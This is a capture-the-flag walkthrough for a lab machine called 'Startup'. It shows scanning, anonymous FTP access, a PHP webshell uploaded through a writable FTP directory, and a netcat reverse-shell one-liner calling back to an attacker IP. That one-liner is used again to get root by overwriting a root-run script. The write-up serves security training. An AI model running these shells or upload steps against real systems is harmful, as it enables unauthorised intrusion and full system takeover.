# Startup ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbNn_u4STOlHTykgczS%2F-MbNw0kONNETUPrR8vt2%2Fimage.png?alt=media\&token=e015f4c2-52f5-4da4-b739-0b0d857982d7) ## Reconnaissance Initial nmap scan to find open ports , using the flag "treat all hosts as alive" (**-Pn**) ``` nmap -Pn 10.10.50.218 ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbOb_JqauIJ1D9ft0-O%2F-MbOc1gzoNpNQY2on9jz%2Fimage.png?alt=media\&token=754e1e59-8738-4005-9127-162cb5178712) Detailed Nmap Scan : Command Breakdown: * (**-sV):** Service version * (**-sC**): Default nmap scripts * (**-p):** Specifying ports 21,22,80 * (**-oN nmap**): Saving it into a files called nmap ``` nmap -sV -sC -p 21,22,80 -oN nmap 10.10.50.218 ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbOb_JqauIJ1D9ft0-O%2F-MbOcN4Xc5irvSWMxYBQ%2Fimage.png?alt=media\&token=92c5e6a3-b525-4c3e-a3a4-2dea03155906) ## Enumeration ### Port 21: FTP From the nmap scan we can see that we are allowed to login as Anonymous, so lets login and see what we can find. `Username: anonymous` `Password: anonymous` ``` ftp 10.10.50.218 ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbOb_JqauIJ1D9ft0-O%2F-MbOe_IHNdSNlj1tge45%2Fimage.png?alt=media\&token=33a47e05-bafd-4cbb-b41c-315420bc80c2) Lets list what files there are in the server ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbOb_JqauIJ1D9ft0-O%2F-MbOfZflKyYEqD_OyBD4%2Fimage.png?alt=media\&token=a4685888-5314-4b3f-8974-56ad74f4350e) There is a directory and 3 files, lets get both the files and then see what is in the directory. ``` get ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbOb_JqauIJ1D9ft0-O%2F-MbOeur5gHrIgbLt_K20%2Fimage.png?alt=media\&token=c51dded2-1ecc-47a5-814b-5748250e4865) ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbOb_JqauIJ1D9ft0-O%2F-MbOff3ZtEINEoRF2C2l%2Fimage.png?alt=media\&token=2a1941a9-bd37-42e0-a6f1-d05aa1eff406) Now lets cd into the ftp directory and check the files ```bash cd ftp ls -la ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbOb_JqauIJ1D9ft0-O%2F-MbOfQrTCaEP8B-P6Edm%2Fimage.png?alt=media\&token=f95c1b87-3ed7-4366-b904-426683046cd1) Looks like there is nothing in the directory. Now lets get back to our machine and read the files. ```bash cat notice.txt ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbOb_JqauIJ1D9ft0-O%2F-MbOfrVt4BqbYNIJvAIx%2Fimage.png?alt=media\&token=7b1255a7-c104-4913-a649-e08462a2f7db) We now have a possible username which is `Maya`, so lets add that to our notes. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbOb_JqauIJ1D9ft0-O%2F-MbOg6EG9-8Et-p1N55t%2Fimage.png?alt=media\&token=3beadd58-4a43-4acf-9800-f55bbc1fd774) The image does not have interesting but it does have something that we should think about :) ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbOb_JqauIJ1D9ft0-O%2F-MbOgSpK4_c3DkBS_b6V%2Fimage.png?alt=media\&token=5cc732b5-52e4-4b27-a242-e50c6a4dccb7) There is nothing in `.test.log` ```bash cat .test.log ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbOb_JqauIJ1D9ft0-O%2F-MbOlGU0Mds2bT7r0ggN%2Fimage.png?alt=media\&token=1b6e416e-2f4c-4b65-baf4-12d1199344ba) Looks like that is all we get from FTP. ### Port 80: HTTP Lets visit the website ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbOb_JqauIJ1D9ft0-O%2F-MbOj0J_pOL3y_8SjBiY%2Fimage.png?alt=media\&token=b85512b2-a5b4-4859-ba86-50813045996c) Lets look at the source code ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbOb_JqauIJ1D9ft0-O%2F-MbOk1utHI-uAnK_O3k9%2Fimage.png?alt=media\&token=88929c9e-2a1d-48c5-a640-d30f6ae22ca8) Nothing of interest, lets use gobuster to find hidden directories ```bash gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.50.218/ ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbOb_JqauIJ1D9ft0-O%2F-MbOkjv8RWb-gJW4FfwE%2Fimage.png?alt=media\&token=7affc7a4-e62c-49a9-b0aa-09aba9ec1b7a) We found a directory called `/files`, lets go visit it ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbOb_JqauIJ1D9ft0-O%2F-MbOkqKxH8kFFUojuPRu%2Fimage.png?alt=media\&token=f9ce6a58-eb48-4ef0-bb95-3bf33cc60f3b) Looks like the same files we found in the FTP server. ## Exploitation Looking at the ftp directory in the FTP server, we had permission to write in the directory, which means we could add a webshell to the directory and access it on the web page. We can use [this ](https://github.com/artyuum)webshell for that. Once you copy it to your directory, lets login through ftp and cd into the ftp directory. Lets move the index.php (which I renamed as `web.php`) to the `/Startup` directory and then login. Now time to put the file into the directory using the put command ```bash put web.php ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbOb_JqauIJ1D9ft0-O%2F-MbOp16c0Ouh-NwTKpv1%2Fimage.png?alt=media\&token=4534bf75-9a76-499e-be39-b4dc8e09f359) Now that we added the `web.php` to the directory, lets visit it on the website ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbOb_JqauIJ1D9ft0-O%2F-MbOphoHj8s2S5aE0Yj0%2Fimage.png?alt=media\&token=696ceabc-1a59-48c3-a089-481d3a70a484) Now we can run commands on the shell. Lets get a reverse shell , we can get the command from [here](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet). ```bash rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.8.64 1234 >/tmp/f ``` We also have to start a netcat listener ```bash nc -lvnp 1234 ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbOb_JqauIJ1D9ft0-O%2F-MbOq9ZgihPjgx-7rx3A%2Fimage.png?alt=media\&token=3ca24085-4f29-4997-a264-55034c86899c) Now we run the command ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbOb_JqauIJ1D9ft0-O%2F-MbOqERbXVBKZECJMq9V%2Fimage.png?alt=media\&token=392e700d-c5ea-4325-ab67-e57a3f7aaa0b) Once you do, you get a reverse shell. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbOb_JqauIJ1D9ft0-O%2F-MbOqJS6XkQV-3W4KZjz%2Fimage.png?alt=media\&token=e99a79b5-bb10-42ec-b123-b1d3a038bda4) Once in the box, use these commands to stabilize the shell ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbOb_JqauIJ1D9ft0-O%2F-MbOqvBXggQa8OOcy0d8%2Fimage.png?alt=media\&token=eaa25d1f-5163-47b5-8ceb-07622c30fcb3) Looking through the directories, there was one directory that was unusual which is `/incidents` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbOqwdzdr3AoSEg8wEe%2F-MbOrLdPLKVsmqd688uK%2Fimage.png?alt=media\&token=c8ff2566-4c63-4ec9-bf0f-3256035d44d7) It has a pcapng file , so lets try to get information from it, but first we need to copy it to the ftp directory so that we can download it from the website. ```bash cp suspicious.pcapng /var/www/html/files/ftp/ ``` Once we do this , we can download the file from the website ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbOrrBNiGr2WrThSp2T%2F-MbOs6J8kNkFLLUBa50D%2Fimage.png?alt=media\&token=3510bb17-fde4-4b27-aaf0-19c869645584) Once downloaded, you can open it with `Wireshark` using this command ```bash wireshark suspicious.pcapng ``` After you use this command, Wireshark opens the packet. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbOrrBNiGr2WrThSp2T%2F-MbOsr23TlEtbbL-KCon%2Fimage.png?alt=media\&token=223e7179-f6df-419c-80c5-81d8d09a89ec) Following a TCP stream we come across some interesting stuff, which is a password ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbOupYiEmgG4MBxLvVu%2F-MbOve4Stf5m5r3lwEzE%2Fimage.png?alt=media\&token=bd73df5a-4cd8-4fc0-a2d8-2965dde0a7a5) Lets try to use this password `c4ntg3t3n0ughsp1c3` to switch users to `Lennie` on the machine ```bash su lennie ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbOupYiEmgG4MBxLvVu%2F-MbOw-XYDkmalFyVzw2O%2Fimage.png?alt=media\&token=8ef84e1f-3c2e-44dd-9037-5486b08a83dd) Looks like we are now Lennie. We can read the `user.txt` now ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbOupYiEmgG4MBxLvVu%2F-MbOwAYBvRHsfjbKzLHC%2Fimage.png?alt=media\&token=5e2a369f-6d3c-40ba-9170-9013d9fb7872) Also looking at the starting directory, we find another interesting file called `/recipe.txt` , lets read that. ```bash cat recipe.txt ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbOupYiEmgG4MBxLvVu%2F-MbOx2AC_ALbcRhQnoTy%2Fimage.png?alt=media\&token=e50ba7d7-64f3-46c4-b586-57f81c379d72) This is the answer to the first question of the room ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbOupYiEmgG4MBxLvVu%2F-MbOx7is1xGb8sZuA-bY%2Fimage.png?alt=media\&token=9a156e1f-0d2e-44f4-91c8-6a90068421cf) ## Privilege Escalation We see a file called planner.sh in the `/scripts` directory in Lennie's home directory. Lets read it. ```bash cat planner.sh ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbOupYiEmgG4MBxLvVu%2F-MbOzNXq_a2BHnXD7GPz%2Fimage.png?alt=media\&token=9cd6a2fe-c1b9-45b0-bd4c-82840928b0f1) It executes a file called `/etc/print.sh`, lets read that file ```bash cat /etc/print.sh ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbOupYiEmgG4MBxLvVu%2F-MbOzmp7cd8cmwdmfuPP%2Fimage.png?alt=media\&token=66abfd04-3db5-4e0b-ab9f-a8ff76ef2586) It is a bash script that prints `Done!`. What if we echo a reverse shell and listen on our machine, would that give us root? Lets try it out. We can use the reverse shell we did before and echo it into the file ```bash echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.8.64 1234 >/tmp/f" > /etc/print.sh ``` Also make sure you started a netcat listener and after a while, you get a reverse shell and as root ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbOupYiEmgG4MBxLvVu%2F-MbP-zGWS8RkZnl2erQP%2Fimage.png?alt=media\&token=13f14c50-bb60-4250-9fae-87223a45885b) You can now read the root.txt flag ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbP0-mqMHTCDddI8HiO%2F-MbP08-C-6NwbF5VAQBK%2Fimage.png?alt=media\&token=79a34485-5e29-463c-93d0-3fe8aafcdd96)